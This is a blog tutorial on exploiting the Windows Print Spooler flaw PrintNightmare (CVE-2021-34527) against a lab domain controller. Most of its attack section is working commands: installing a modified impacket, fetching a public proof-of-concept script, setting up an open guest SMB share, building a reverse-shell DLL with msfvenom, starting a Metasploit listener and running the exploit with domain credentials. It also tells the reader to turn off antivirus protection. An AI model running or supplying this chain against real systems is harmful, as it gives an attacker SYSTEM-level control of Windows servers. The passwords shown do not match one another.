The Dutch Hacker
How to exploit the PrintNightmare CVE-2021-34527

How to exploit the PrintNightmare CVE-2021-34527

This guide will show you how to exploit the PrintNightmare vulnerability known under CVE-2021-34527. This is A remote code execution vulnerability in the Windows Print Spooler service that will give us system privileges. This guide will show you how this is done. I will be using kali at the attacker machine and a domain controller with a Windows server 2019 OS

The Explanation

The print spooler service is started as the system account which is the highest account in windows that you can take over. You will trick the print spooler to install a new driver from an unc path and load that driver. In our case, a DLL file and once loaded will give the reverse shell to our kali machine. Because the print spooler service is started as System user it will be the system user calling back to the kali machine and not the non-privledged user we are using to install the driver.

The Preparation

Make sure you have a Windows server running in the same subnet. Mine is running on a Hyper-V server. I made the server a domain controller. This will be the machine that we will be attacking. Create a new user in this domain. Mine is called test and have gotten the password Test1235. I also have turned off the real-time protection as I’m using msvenom to create the dll and Bitdefender is picking this up. You can create one that bypasses that but that will be out of scope for this blog post. Also, make sure the print spooler is turned on

Preparation in Kali

Open a terminal and enter the following commands. This will get an alternate package of impacket and will download the python script needed for this exploit

cd /tmp/
sudo pip3 uninstall impacket
git clone https://github.com/cube0x0/impacket
cd impacket
sudo python3 ./setup.py install
wget https://raw.githubusercontent.com/cube0x0/CVE-2021-1675/main/CVE-2021-1675.py
exploit the PrintNightmare

The script will need to download a malicious DLL file. So we need a share and for this, we will create an smb server on kali.

Type in the following command to config the smb server to point to the tmp directory on your kali machine. We are using this tmp directory because when rebooting kali all will be gone. But you can choose any directory you want. Just make sure it has the correct rights to be used as a public share.

sudo nano /etc/samba/smb.conf

Put in the following config

 [global]
     map to guest = Bad User
     server role = standalone server
     usershare allow guests = yes
     idmap config * : backend = tdb
     smb ports = 445
  
 [smb]
     comment = Samba
     path = /tmp/
     guest ok = yes
     read only = no
     browsable = yes
     force user = smbuser 

Start the smb server with the following command

sudo service smbd restart 

Now we are going to create the DLL that we will be using to create a reverse shell. Type in the following command and change the IP to your kali machine IP and copy the dll to the tmp directory

msfvenom  -f dll -p windows/x64/shell_reverse_tcp LHOST=10.0.0.132 LPORT=443 -o reverse.dll
cp reverse.dll /tmp
exploit the PrintNightmare

Next we will start a listener with msfconsole. Type in the following commands

msfconsole
use multi/handler
set PAYLOAD windows/x64/shell_reverse_tcp
set LHOST 10.0.0.132
set LPORT 443
run
exploit the PrintNightmare

The Exploit the PrintNightmare

Navigate to the tmp directory as that is where we have our py file. Type in the following command to start the exploit. Please do change the IP address to your lab environment. The first Ip is the Windows machine and the second the kali

sudo python3 CVE-2021-1675.py test:Welkom123@10.0.0.117 '\\10.0.0.132\smb\reverse.dll'
exploit the PrintNightmare

Reference

Most Popular Post

Sign Up

Signup today for free and be the first to get notified on new updates.
* indicates required

Follow Me

Most Popular Post

Contact Us